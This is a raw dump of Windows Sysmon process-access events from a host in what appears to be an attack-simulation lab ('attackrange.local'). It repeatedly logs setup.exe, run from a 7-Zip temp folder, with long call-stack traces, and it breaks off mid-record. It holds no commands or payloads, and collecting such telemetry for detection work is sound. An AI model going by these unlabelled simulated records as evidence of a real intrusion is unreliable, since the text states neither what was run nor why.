13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows